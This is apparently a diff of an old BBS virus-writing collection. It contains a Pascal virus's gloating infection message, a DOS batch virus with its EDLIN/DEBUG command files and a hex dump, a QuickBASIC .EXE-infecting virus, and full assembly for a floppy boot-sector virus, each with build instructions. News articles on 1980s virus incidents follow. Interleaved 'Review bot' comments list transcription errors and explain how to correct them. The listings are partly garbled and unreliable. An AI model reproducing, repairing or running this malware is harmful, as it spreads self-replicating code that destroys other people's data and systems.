Writeln(' '); {Give a lot of smiles} +Writeln(''); +Writeln(' '); +Writeln('  ATTENTION: '); +Writeln('  I have been elected to inform you that throughout your process of '); +Writeln('  collecting and executing files, you have accidentally HK '); +Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln('  be; YES, it CAN be, a s has infected your system. Now what do '); +Writeln('  you have to say about that? HAHAHAHA. 
Have H with this one and '); +Writeln('  remember, there is NO cure for '); +Writeln('  '); +Writeln('  '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  '); +Writeln('  '); +Writeln(' '); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on "ind" ONLY name entries) + +edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console interface is again assigned) +name ( Newly created NAME.BAT is called. 
+ + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the "IND" file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 ".BAT" (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100"DEL " (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. 
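Review bot: the hex dump of command file 3 has a transcription error at offset 011Ah: "OD" (letter O) where the byte 0Dh (carriage return) is meant, matching the 0Dh that follows the first 1Ah on the 0100 line. The ASCII column of the 0110 line also does not match its bytes: 32 2C 32 3F 52 is "2,2?R" but is shown as "2 , ? ? r". Anyone re-entering the file from this dump would get the wrong byte.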
+This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$="BV3.EXE" +110 REM *** WRITE THE DIRECTORY IN THE FILE "INH" +130 SHELL "DIR *.EXE>INH" +140 REM ** OPEN "INH" FILE AND READ NAMES ** +150 OPEN "R",1,"INH",32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** "%" IS THE MARKER OF THE BV3 +250 REM ** "%" IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)="." +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$="" +370 REM ++ OPEN FILE FOUND +++ +380 OPEN "R",2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ "%" AT THE END OF THE FILE MEANS.. 
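Review bot: the BASIC listing has transcription errors that stop it running as printed, and the header should say so or they should be corrected: line 210 reads ON ERROR GOT 670 (GOTO); line 290 uses ORIGINAL and EXTENSIONS$ where lines 280 and 350 use ORIGINAL$ and EXTENSION$; line 380 opens OROGINAL$; and line 410 does LINE INPUT#1, which reads the next line of the INH directory listing on channel 1 rather than anything from the program opened as #2 at line 380, so TEST$ never holds data from the opened program.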
+450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)="%" +499 REM ++++ SANE "HEALTHY" PROGRAM ++++ +510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$="COPY "+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a "INH" file which contains the directory, and the file %SORT.EXE. +Programs which start with "%" are NOT infected ,they pose as back up copies. + +Downloaded From P-80 International Information Systems 304-744-2253 +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. 
It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. 
Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) 
+ MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... 
+ JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... 
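Review bot: two problems in the boot-sector listing. (1) The track number in the comments is inconsistent: the header says the real boot sector is kept at track 39, and MOV CX,2708H selects cylinder 27h = 39 (zero-based), matching MOV CH,40-1 in RE_INFECT, but the step-5 comment and the "TRACK 40, SECTOR 8" and "TRACK 40H" comments say 40. (2) Several literals lack the H suffix and would be read as decimal: MOV AX,[0410] (the equipment flag is at 0:0410h), INT 13 and MOV AX,0201 / MOV AX,0301 in the NEW_19 retry loop and RI_10 (INT 13 is INT 0Dh), and CMP DI,3456 in N19_90 compares against decimal 3456 (0D80h) while RI_12 sets DI to 3456H and BEGIN compares against 3456H, so the "just infected" flag would never match at N19_90 as printed and the INT 19H path after RI_12 would repeat.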
+ JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... 
+ INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + There's A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. Since the +first tests of the notion in 1983 that machines can catch and spread +"information diseases," the computer world has reached the point at which as +many as thirty instances of "computer virus" have been reported in the past +year, affecting tens of thousands of U.S. 
computers alone. + + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the world's largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by it's author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. + + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this year's only such +day. 
+ + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machines' users to follow routine computer +hygiene: Don't trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + "The only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers," says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +"Vaccine," "Flu Shot," "Data Physician," "Syringe." + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + "What we are dealing with here is the fabric of trust in society," says +Murray. "With computer viruses, we have a big vulnerability." 
+ + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. On March 2, the virus interrupted users +by flashing this message on their screens: + + "Richard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the "Trojan horse," a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the "time bomb," which +explodes at a set time, and the "logic bomb," which goes off when the +computer arrives at a certain result during normal computation. The "salami +attack" executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The "scores" virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. 
"It looks + as if it searching for a particular Macintosh program with a name that + no one recognizes," spokesman Charles Redmond says. + + This virus, still spreading, has reached computers in Congress' + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer Incorporated's government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer "bulletin boards" where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The "brain" virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like "scores," it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The "Christmas" virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiver's computer to display the + greeting, then secretly send the virus and message to everyone on the + recipient's regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke down within hours + when the message began multiplying, stuffing the computers' memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. + + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term "computer Viruses." 
A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. + + This, however, "allows the least trusted user to write a program that +can be used by everyone" and is "very dangerous," he says. + + Computers "are all at risk," says Cohen, "and will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence." + + +1.) Computer "viruses" are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: "bulletin boards" where anyone can copy them + for personal use. + +4.) A computer receiving the programs will "read" the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computer's clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) 
In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + 'Virus' infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + "It definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely," said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + "This was information we were using to base diagnoses on," said Juni, who +reported the case in a letter in The New England Journal of Medicine. "We were +lucky and caught it in time." + + A computer virus is a set of instructions designed to reproduce and spread +from computer to computer. Some viruses do damage in the process, such as +destroying files or overloading computers. 
+ + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. + + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + "Prosecutor Wins Conviction In Computer Data Destruction" + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer "virus" in his employer's system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. + + Tarrant County Assistant 